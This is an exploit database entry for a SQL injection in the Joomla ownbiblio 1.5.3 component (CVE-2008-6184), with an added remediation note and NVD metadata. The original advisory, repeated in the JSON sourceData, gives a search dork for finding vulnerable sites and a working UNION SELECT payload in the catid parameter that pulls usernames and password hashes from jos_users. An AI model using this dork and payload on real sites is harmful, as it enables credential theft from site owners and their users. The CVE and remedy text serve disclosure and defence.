ID EDB-ID:6730
Type exploitdb
Reporter H!tm@N
Modified 2008-10-11T00:00:00
Description
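Joomla Component ownbiblio 1.5.3 (catid) SQL Injection Vulnerability. CVE-2008-6184. Webapps exploit for php platform. The flaw is in the `catid` request parameter of the component's catalogue view (`option=com_ownbiblio&view=catalogue`): its value reaches a SQL query without, apparently, being restricted to a number (CWE-89), so a remote request that needs no authentication can read database contents, including the Joomla user table shown in the example below. No fixed version is listed on this page. The standard remedy for this class of flaw is to validate `catid` as an integer and build the query with parameterized or properly quoted values; non-numeric `catid` values in web-server logs for `com_ownbiblio` requests are a practical indicator of probing.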
#############################################################################
# #
# Joomla Component Ownbiblio SQL Injection Vulnerability #
# #
#############################################################################
########################################
[~] Vulnerability found by: H!tm@N
[~] Contact: hitman[at]khg-crew[dot]ws
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-]
########################################
[~] ScriptName: "Joomla"
[~] Component: "Ownbiblio (com_ownbiblio)"
[~] Version: "1.5.3"
[~] Author: "Sebastian Kruvinnus, Michael Kehrwecker"
########################################
[~] DORK: inurl:"com_ownbiblio" catalogue
########################################
[~] Exploit: /index.php?option=com_ownbiblio&view=catalogue&catid=[SQL]
[~] Example: /index.php?option=com_ownbiblio&view=catalogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
########################################
[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] United States of Albania
########################################
# milw0rm.com [2008-10-11]
{"id": "EDB-ID:6730", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Joomla Component ownbiblio 1.5.3 catid SQL Injection Vulnerability", "description": "Joomla Component ownbiblio 1.5.3 (catid) SQL Injection Vulnerability. CVE-2008-6184. Webapps exploit for php platform", "published": "2008-10-11T00:00:00", "modified": "2008-10-11T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/6730/", "reporter": "H!tm@N", "references": [], "cvelist": ["CVE-2008-6184"], "lastseen": "2016-02-01T01:30:53", "viewCount": 11, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2016-02-01T01:30:53", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-6184"]}], "modified": "2016-02-01T01:30:53", "rev": 2}, "vulnersScore": 7.2}, "sourceHref": "https://www.exploit-db.com/download/6730/", "sourceData": "#############################################################################\n#\t\t\t\t\t\t\t #\n# Joomla Component Ownbiblio SQL Injection Vulnerability #\n#\t\t\t\t\t\t\t #\n#############################################################################\n\n\n########################################\n\n[~] Vulnerability found by: H!tm@N\n[~] Contact: hitman[at]khg-crew[dot]ws\n[~] Site: www.khg-crew.ws\n[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-]\n\n########################################\n\n[~] ScriptName: \"Joomla\"\n[~] Component: \"Ownbiblio (com_ownbiblio)\"\n[~] Version: \"1.5.3\" \n[~] Author: \"Sebastian Kruvinnus, Michael Kehrwecker\"\n\n########################################\n\n[~] DORK: inurl:\"com_ownbiblio\" catalogue\n\n########################################\n\n[~] Exploit: /index.php?option=com_ownbiblio&view=catalogue&catid=[SQL]\n[~] Example: 
/index.php?option=com_ownbiblio&view=catalogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--\n\n########################################\n\n[~] Proud 2 be Albanian\n[~] Proud 2 be Muslim\n[~] United States of Albania\n\n########################################\n\n# milw0rm.com [2008-10-11]\n", "osvdbidlist": ["49109"]}
{"cve": [{"lastseen": "2020-10-03T11:51:05", "description": "SQL injection vulnerability in the OwnBiblio (com_ownbiblio) component 1.5.3 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in a catalogue action to index.php.", "edition": 3, "cvss3": {}, "published": "2009-02-19T18:30:00", "title": "CVE-2008-6184", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-6184"], "modified": "2017-09-29T01:33:00", "cpe": ["cpe:/a:medialab-karlsruhe:ownbiblio:1.5.3"], "id": "CVE-2008-6184", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6184", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:medialab-karlsruhe:ownbiblio:1.5.3:*:*:*:*:*:*:*"]}]}